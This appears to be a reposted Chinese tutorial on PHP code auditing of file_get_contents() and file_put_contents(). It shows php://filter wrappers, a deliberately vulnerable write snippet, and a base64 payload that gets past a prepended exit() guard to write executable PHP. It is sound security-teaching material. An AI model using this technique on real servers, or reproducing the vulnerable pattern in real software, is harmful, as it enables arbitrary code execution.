2. 程式人生 > 實用技巧 >php程式碼審計-file_get_contents()&file_put_contents()

php程式碼審計-file_get_contents()&file_put_contents()

阿新 發佈:2020-10-26

file_get_contents()

https://www.php.net/function.file-get-contents

只需要瞭解filename即可

  • filename可以是簡單的一個檔案path,相對路徑或者絕對路徑
<?php
// <= PHP 5
$file = file_get_contents('./people.txt', true);
// > PHP 5
$file = file_get_contents('./people.txt', FILE_USE_INCLUDE_PATH);
?>

很顯然它的返回值是讀取檔案的內容

  • filename也可以是一個url

如:

  • filename也可以是一個偽協議形式的:

如:

echo file_get_contents('php://input');

或者

echo file_get_contents('php://filter/read=convert.base64-encode/resource=test.txt');

file_put_contents()

直接看使用例項:

  1. 直接向檔案寫入內容(filename為檔案路徑)
<?php
$file = 'people.txt';
// Open the file to get existing content
$current = file_get_contents($file);
// Append a new person to the file
$current .= "John Smith\n";
// Write the contents back to the file
file_put_contents($file, $current);
?>
  1. 和file_get_contents()類似的,file_put_contents()的filename引數也可以用PHP偽協議來修飾,以控制寫入檔案內容的格式等

eg1:

file_put_contents('php://filter/write=convert.base64-encode/resource=tmp.php',"123456");

然後tmp.php裡面

其中 MTIzNDU2=base64_encode("123456")

eg2:

<?php 
	file_put_contents('php://filter/write=convert.base64-decode/resource=tmp.php',"MTIzNDU2");
?>

繞過死亡exit()

如下程式碼:

$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);

$content在開頭增加了exit過程,導致即使我們成功寫入一句話,也執行不了
這裡就可以利用file_put_contents()filename引數可以用偽協議過濾的特性:

比如可以傳入引數:

filename=php://filter/write=convert.base64-decode/resource=tmp.php&txt=aPD9waHAgcGhwaW5mbygpOyA/Pg==
//PD9waHAgcGhwaW5mbygpOyA/Pg== 是<?php phpinfo(); ?>的base64

訪問tmp.php

原理可以參考 https://www.leavesongs.com/PENETRATION/php-filter-magic.html,這篇文章裡面還有一些別的姿勢也可以參考

相關推薦

php程式碼審計-file_get_contents()&amp;file_put_contents()

file_get_contents() https://www.php.net/function.file-get-contents 只需要瞭解filename即可 filename可以是簡單的一個檔案path,相對路徑或者絕對路徑

PHP程式碼審計分段講解(9)

22 弱型別整數大小比較繞過 <?php error_reporting(0); $flag = \"flag{test}\"; $temp = $_GET[\'password\'];

PHP程式碼審計分段講解(11)

後面的題目相對於之前的題目難度稍微提升了一些,所以對每道題進行單獨的分析

PHP程式碼審計01

概述 程式碼審計是對應用程式原始碼進行系統性檢查的工作,目的是為了找到並且修復應用程式在開發階段存在的一些漏洞,或者程式邏輯錯誤。

PHP程式碼審計分段講解(12)

28題 <!DOCTYPE html> <html> <head> <title>Web 350</title> <style type=\"text/css\">

PHP程式碼審計分段講解(13)

程式碼審計分段講解之29題,程式碼如下: <?php require(\"config.php\"); $table = $_GET[\'table\']?$_GET[\'table\']:\"test\";

PHP程式碼審計分段講解(14)

30題利用提交陣列繞過邏輯 本篇部落格是PHP程式碼審計分段講解系列題解的最後一篇,對於我這個懶癌患者來說,很多事情知易行難,堅持下去,繼續學習和提高自己。

網路安全知識--PHP程式碼審計/Web For Pantesters 的 SQL injection

SQL 注入一般流程 判斷有無注入 單引號判斷: ?name=root\'對應語句 select * from table where name=\'root\'\' 不符合語法規範,報錯,說明有注入

php程式碼審計-使用者名稱和密碼分開檢驗

程式碼 [GXYCTF2019]BabySQli config.php <?php DEFINE(\'DB_USER\',\'123\'); DEFINE(\'DB_PASSWORD\',\'123\');

PHP程式碼審計04之strpos函式使用不當

前言 根據紅日安全寫的文章,學習PHP程式碼審計的第四節內容,題目均來自PHP SECURITY CALENDAR 2017,講完題目會用一個例項來加深鞏固,這是之前寫的,有興趣可以去看看:

php程式碼審計

也是BUUCTF上的一個題 應該是HCTF2018 warmup 進入環境後發現一個滑稽,直接看原始碼,發現有source.php,直接開啟不廢話,上程式碼

PHP程式碼審計05之正則使用不當

前言 根據紅日安全寫的文章,學習PHP程式碼審計的第五節內容,題目均來自PHP SECURITY CALENDAR 2017,講完題目會用一道CTF的題目和例項來加深鞏固。這是之前寫的,有興趣可以去看看:

部分php程式碼審計

[HCTF 2018]WarmUp 題目本身並不難,主要是php程式碼讀的太少了,許多函式都是一臉懵。

部分php程式碼審計習題(2)

[RoarCTF 2019]Easy Calc 網頁開啟之後就是一個非常普通的計算器(web應用),直接翻查原始碼,主要看js程式碼

php程式碼審計基礎學習(一)

零、參考文章而和書籍 https://www.jianshu.com/p/f69b1f2fcdcf https://zhuanlan.zhihu.com/p/22417081

php程式碼審計-sql注入進階篇

關鍵字過濾 部分waf會對關鍵字進行過濾,我們可以用大小寫或者雙寫關鍵字來繞過。

php程式碼審計入門前必看

首先先介紹什麼是程式碼審計程式碼審計:是指標對原始碼進行檢查,尋找程式碼中的bug,這是一項需要多方面技能的技術

【Web】WarmUp——PHP程式碼審計

1、題目資訊 2、解題思路 3、解題過程 4、思路總結 1、題目資訊: 描  述:WarmUp,PHP程式碼審計

PHP 程式碼審計

PHP 程式碼審計 檔案包含 常見的導致檔案包含的函式有: PHP:include(),include_once(),require(),require_once(),fopen(),readfile() 等

PHP程式碼審計神器——RIPS個人漢化版

一、RIPS簡介 RIPS是一款PHP開發的開源的PHP程式碼審計工具,由國外的安全研究者Johannes Dahse開發,目前開源的最新版本是0.55。